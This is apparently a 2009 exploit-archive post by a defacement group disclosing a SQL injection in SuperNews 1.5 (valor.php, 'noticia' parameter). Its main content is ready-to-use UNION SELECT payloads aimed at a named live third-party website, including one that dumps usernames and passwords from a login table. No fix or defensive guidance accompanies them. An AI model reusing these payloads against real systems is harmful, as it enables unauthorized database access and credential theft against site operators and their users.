[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SuperNews 1.5 (valor.php noticia) SQL Injection Vulnerability
# Published : 2009-03-23
# Author : p3s0k!
# Previous Title : WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit
# Next Title : X-BLC 0.2.0 (get_read.php section) SQL Injection Vulnerability


#############################################################
SuperNews 1.5 SQL Injection in valor.php
#############################################################


###################################################
#[~] Author :  p3s0k!
#[~] Terminal Hacker Team
###################################################

Example:
http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]


LiveDEMO:

http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5--
http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--



##############################
#[!] Terminal Hacker Defacers
#[!] www.TerminalHacker.es
##############################

# www.Syue.com [2009-03-23]